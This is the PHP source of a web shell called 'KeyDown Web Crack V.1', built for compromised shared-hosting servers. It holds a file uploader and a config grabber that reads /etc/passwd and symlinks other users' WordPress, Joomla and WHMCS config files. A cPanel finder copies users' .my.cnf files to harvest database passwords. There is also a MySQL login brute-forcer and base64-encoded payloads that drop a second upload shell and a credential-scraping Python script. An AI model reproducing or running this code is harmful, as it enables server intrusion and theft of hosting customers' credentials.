Keydown WebCrack V.1

1. <head>
2.   <title>KeyDown Web Crack V.1</title>
3.   <meta charset="utf-8">
4.   <meta name="viewport" content="width=device-width, initial-scale=1">
5.   <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
6.   <style>
7.  
8. #menu a{
9.     text-align:center;
10.     padding:4px 18px;
11.     margin:0;
12.     background:teal;
13.     border:2px solid black;
14.     text-decoration:none;
15.     letter-spacing:1px;
16.     color:white;
17. }
18. #menu a:hover{
19.     background:maroon;
20.     border-bottom:1px solid #333333;
21.     border-top:1px solid #333333;
22. }
23.   .wkwk {
24.   display: inline-block;
25.     padding: 6px 12px;
26.     margin-bottom: 0;
27.     font-size: 14px;
28.     font-weight: 400;
29.    
30.     border:1px solid teal;
31.     text-align: left;
32.     white-space: nowrap;
33.   }
34.   .tabnet{
35.     margin:15px auto 0 auto;
36.     border: 1px solid #333333;
37. }
38. .main {
39.     width:100%;
40. }
41. .gaya {
42.     color: #00ff00;
43. }
44. strong {
45.     font-weight: 200;
46. }
47. .inputz{
48.     background:#111111;
49.     border:0;
50.     padding:2px;
51.     border-bottom:1px solid #222222;
52.     border-top:1px solid #222222;
53. }
54. .inputzbut{
55.     background:#111111;
56.     color:#00ff00;
57.     margin:0 4px;
58.     border:1px solid #444444;
59.  
60. }
61. .inputz:hover, .inputzbut:hover{
62.     border-bottom:1px solid #00ff00;
63.     border-top:1px solid #00ff00;
64. }
65. .output {
66.     margin:auto;
67.     border:1px solid #00ff00;
68.     width:100%;
69.     height:400px;
70.     background:#000000;
71.     padding:0 2px;
72. }
73. .cmdbox{
74.     width:100%;
75. }
76. .head_info{
77.     padding: 0 4px;
78. }
79. .b374k{
80.     font-size:30px;
81.     padding:0;
82.     color:#444444;
83. }
84. .b374k1{
85.     font-size:30px;
86.     padding:0;
87.     color: #333333;
88. }
89. .b374k_tbl{
90.     text-align:center;
91.     margin:0 4px 0 0;
92.     padding:0 4px 0 0;
93.     border-right:1px solid #333333;
94. }
95. .phpinfo table{
96.     width:100%;
97.     padding:0 0 0 0;
98. }
99. .phpinfo td{
100.     background:#111111;
101.     color:#cccccc;
102. padding:6px 8px;;
103. }
104. .phpinfo th, th{
105.     background:#191919;
106.     border-bottom:1px solid #333333;
107. font-weight:normal;
108. }
109. .phpinfo h2, .phpinfo h2 a{
110.     text-align:center;
111.     font-size:16px;
112.     padding:0;
113.     margin:30px 0 0 0;
114.     background:#222222;
115.     padding:4px 0;
116. }
117. .explore{
118. width:100%;
119. }
120. .explore a {
121. text-decoration:none;
122. }
123. .explore td{
124. border-bottom:1px solid #333333;
125. padding:0 8px;
126. line-height:24px;
127. }
128. .explore th{
129. padding:3px 8px;
130. font-weight:normal;
131. }
132. .explore th:hover , .phpinfo th:hover{
133. border-bottom:1px solid #00ff00;
134. }
135. .explore tr:hover{
136. background:#111111;
137. }
138. .viewfile{
139. background:#EDECEB;
140. color:#000000;
141. margin:4px 2px;
142. padding:8px;
143. }
144. .sembunyi{
145. display:none;
146. padding:0;margin:0;
147. }
148.  
149.  
150.     body {
151.         background:black;
152.         color:teal;
153.     }
154.     textarea {
155.         resize:none;
156.     }
157.     input[type=file]{
158.         display : inline;
159.     }
160.     td {
161.      
162. }​
163.     </style>
164. </head>
165. <body background=black>
166. <center>
167. <div class="container">
168. <table width=76% align=center>
169.  
170.   <tr>
171.   <td class="wkwk" style="text-align:center;background:teal;padding-top:15px;" align=center>
172.   <font color=white><h2>-=[ KeyDown Web Crack V.1 ]=-</h2>
173.   <br/></font></td></tr></table>
174.  
175.  
176.   <?php
177.   @ini_set('display_errors', 0);
178.   function showdisablefunctions() {
179.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=teal><b>".$disablefunc."</b></font></span>"; }
180.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
181.     }
182.   $anmcoder = @php_uname();
183.   $d = showdisablefunctions().' <font color=white>on</font> <font color=lime>'.php_sapi_name().'</font>';
184.   $soft = getenv("SERVER_SOFTWARE");
185.   echo '
186.  <table width=76% align=center>
187.  
188.  <tr>
189.  <td class="wkwk" align=right><font color=white>Software  </font></td><td class="wkwk" align=left><font color=red> '.$soft.'</font></td></tr><tr>
190.  <td class="wkwk" align=right><font color=white>System OS  </font></td><td class="wkwk" align=left><font color=red> '.$anmcoder.'</font></td></tr>
191.  <tr><td class="wkwk" align=right><font color=white>Disabled  </font></td>
192.  <td class="wkwk" align=left><font color=red><pre class"wkwk" style="border:1px solid black;max-height: 46px;max-width: 742px;width: 742px;background-color: black;  ">'.$d.'</pre></font></td></tr>
193.  
194. </table>';
195.   ?>
196.  
197. </div>
198. </center><center>
199. <div class="container" style="border:1px solid teal;max-width:866;padding-right:0px;;padding-left:0px;">
200. <table width=76%  align=center>
201. <td class="wkwk" style="padding-top:15px;width:76%;background:teal;" align=center>
202. <div id ="menu" class="wkwk" ><center>
203. <a href="?">HOME</a>
204. <a href="?keydown=config">CONFIG</a>
205. <a href="?keydown=cpbrute">CPANEL BRUTE</a>
206. <a href="?keydown=cpfinder">CPANEL FINDER</a>
207. <a href="?keydown=symlink">SYMLINK</a>
208. <a href="?keydown=keydownshell">KEYDOWN SHELL</a></center>
209. </div>
210. </td></table>
211. <?php
212. function uploader(){
213.     echo '<br/><br/><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
214. echo '<input type="file" class="wkwk" name="file" size="50">  <input class="wkwk" name="_upl" type="submit" id="_upl" value="Upload"></form>';
215.  
216. if( $_POST['_upl'] == "Upload" ) {
217. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br/><b>Upload Success !</b>'; }
218. else { echo '<br/><b>Upload Failed !</b>'; }
219. }
220. }
221. function config() {
222. ?> 
223.     <form action="" method="post">
224.     <br/>
225. <?php
226. echo "
227. <form method='POST'>
228. </head>
229. <style>
230. textarea {
231. resize:none;
232. width:600px;
233. height:200px;
234. }
235. input {
236. color: #000000;
237. border:1px dotted white;
238. }
239. </style>";
240. echo "<center>"; ?></center><center>
241. <?php if (empty($_POST['config'])) { ?><div style="font-family: Iceland;font-size: 20pt;text-shadow: 0 0 2px teal, 0 0 2px teal, 0 0 2px teal;color: #000"><br/>CONFIG GRABBER</div><br/><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br/><br/><input name="config"  size="100" value="HELL SOON" type="submit"><br/></form></center><br/><?php }if ($_POST['config']) {$function = $functions = @ini_get("disable_functions");
242. if (eregi("symlink", $functions)) {die('<error>Symlink disabled :( </error>');
243. }@mkdir('KeyDOwn', 0755);
244. @chdir('KeyDown');
245. $htaccess = "
246. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
247. Options Indexes FollowSymLinks
248. ForceType text/plain
249. AddType text/plain .php
250. AddType text/plain .html
251. AddType text/html .shtml
252. AddType txt .php
253. AddHandler server-parsed .php
254. AddHandler txt .php
255. AddHandler txt .html
256. AddHandler txt .shtml
257. Options All
258. Options All";
259. file_put_contents(".htaccess", $htaccess, FILE_APPEND);
260. $passwd = $_POST["passwd"];
261. $passwd = explode("
262. ", $passwd);
263. echo "<br/><br/><center><font color=#b0b000 size=2pt>Sabar cok !</center><br/>";
264. foreach ($passwd as $pwd) {$pawd = explode(":", $pwd);
265. $user = $pawd[0];
266. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
267. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
268. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
269. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
270. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
271. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
272. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
273. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
274. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
275. @symlink('/home/' . $user . '/public_html/config.php', $user . '-configgg.txt');
276. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
277. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
278. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
279. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
280. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
281. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
282. @symlink('/home/' . $user . '/public_html/db.php', $user . '-dbconf.txt');
283. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
284. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
285. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-wp-test.txt');
286. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
287. @symlink('/home/' . $user . '/public_html/portal/configuration.php', $user . '-joomla-protal.txt');
288. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
289. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
290. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
291. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
292. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
293. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
294. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
295. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
296. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm15.txt');
297. @symlink('/home/' . $user . '/public_html/central/configuration.php', $user . '-whm-central.txt');
298. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
299. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
300. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
301. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmcs.txt');
302. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support.txt');
303. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
304. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-whmcs2.txt');
305. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm.txt');
306. }echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="KeyDown">OPEN GRAB NOW !</a></font></b>';
307. }
308. }
309. function cpfinder(){
310.     function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
311.     $ar0=explode($marqueurDebutLien, $text);
312.     $ar1=explode($marqueurFinLien, $ar0[$i]);
313.     return trim($ar1[0]);
314. }
315.  
316. echo '<br/><div style="font-family: Iceland;font-size: 20pt;text-shadow: 0 0 2px teal, 0 0 2px teal, 0 0 2px teal;color: #000">cPanel Finder</div><br/>';
317.  
318. $d0mains = @file('/etc/named.conf');
319. $domains = scandir("/var/named");
320.  
321. if ($domains or $d0mains)
322. {
323.     $domains = scandir("/var/named");
324.     if($domains) {
325. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
326. $count=1;
327. $dc = 0;
328. $list = scandir("/var/named");
329. foreach($list as $domain){
330. if(strpos($domain,".db")){
331. $domain = str_replace('.db','',$domain);
332. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
333. $dirz = '/home/'.$owner['name'].'/.my.cnf';
334. $path = getcwd();
335.  
336. if (is_readable($dirz)) {
337. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
338. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
339. $password=entre2v2($p,'password="','"');
340. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
341. $dc++;
342. }
343.  
344. }
345. }
346. echo '</table>';
347. $total = $dc;
348. echo '<br/><div class="result"><h3>Total cPanel Found = '.$total.'</h3></div><br/>';
349.  
350. }else{
351. $d0mains = @file('/etc/named.conf');
352.     if($d0mains) {
353. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
354. $count=1;
355. $dc = 0;
356. $mck = array();
357. foreach($d0mains as $d0main){
358.     if(@eregi('zone',$d0main)){
359.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
360.         flush();
361.         if(strlen(trim($domain[1][0])) >2){
362.             $mck[] = $domain[1][0];
363.         }
364.     }
365. }
366. $mck = array_unique($mck);
367. $usr = array();
368. $dmn = array();
369. foreach($mck as $o) {
370.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
371.     $usr[] = $infos['name'];
372.     $dmn[] = $o;
373. }
374. array_multisort($usr,$dmn);
375. $dt = file('/etc/passwd');
376. $passwd = array();
377. foreach($dt as $d) {
378.     $r = explode(':',$d);
379.     if(strpos($r[5],'home')) {
380.         $passwd[$r[0]] = $r[5];
381.     }
382. }
383. $l=0;
384. $j=1;
385. foreach($usr as $r) {
386. $dirz = '/home/'.$r.'/.my.cnf';
387. $path = getcwd();
388. if (is_readable($dirz)) {
389. copy($dirz, ''.$path.'/'.$r.'.txt');
390. $p=file_get_contents(''.$path.'/'.$r.'.txt');
391. $password=entre2v2($p,'password="','"');
392. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
393. $dc++;
394.                 flush();
395.                 $l=$l?0:1;
396.                 $j++;
397.                 }
398.             }
399.             }
400. echo '</table>';
401. $total = $dc;
402. echo '<br/><div class="result"><h3>Total cPanel Found = '.$total.'</h3></div><br/>';
403.  
404. }
405. }else{
406. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br/><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div><br/><br/>";
407. }
408. }
409. function cpcrack() {
410.     @set_time_limit(0);
411. @error_reporting(0);
412.  
413.  
414. if($_POST['page']=='find')
415. {
416. if(isset($_POST['usernames']) && isset($_POST['passwords']))
417. {
418.     if($_POST['type'] == 'passwd'){
419.         $e = explode("\n",$_POST['usernames']);
420.         foreach($e as $value){
421.         $k = explode(":",$value);
422.         $username .= $k['0']." ";
423.         }
424.     }elseif($_POST['type'] == 'simple'){
425.         $username = str_replace("\n",' ',$_POST['usernames']);
426.     }
427.     $a1 = explode(" ",$username);
428.     $a2 = explode("\n",$_POST['passwords']);
429.     $id2 = count($a2);
430.     $ok = 0;
431.     foreach($a1 as $user )
432.     {
433.         if($user !== '')
434.         {
435.         $user=trim($user);
436.          for($i=0;$i<=$id2;$i++)
437.          {
438.             $pass = trim($a2[$i]);
439.             if(@mysql_connect('localhost',$user,$pass))
440.             {
441.                 echo "PSWCYBER~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
442.                 $ok++;
443.             }
444.          }
445.         }
446.     }
447.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by Pringsewu Cyber</b>";
448.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
449.     exit;
450. }
451. }
452. if($_POST['pass']=='password'){
453. @error_reporting(0);
454. $i = getenv('REMOTE_ADDR');
455. $d = date('D, M jS, Y H:i',time());
456. $h = $_SERVER['HTTP_HOST'];
457. $dir=$_SERVER['PHP_SELF'];
458. //mail("[email protected]","Teamroot Bruteforce","IP : $i \n | Host : $h \n | Dir : $dir \n ");
459. $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
460. $file = fopen(".php","w+");
461. $write = fwrite ($file ,base64_decode($back));
462. fclose($file);
463. chmod(".php",0755);
464. mkdir('config',0755);
465. $cp =
466. 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihk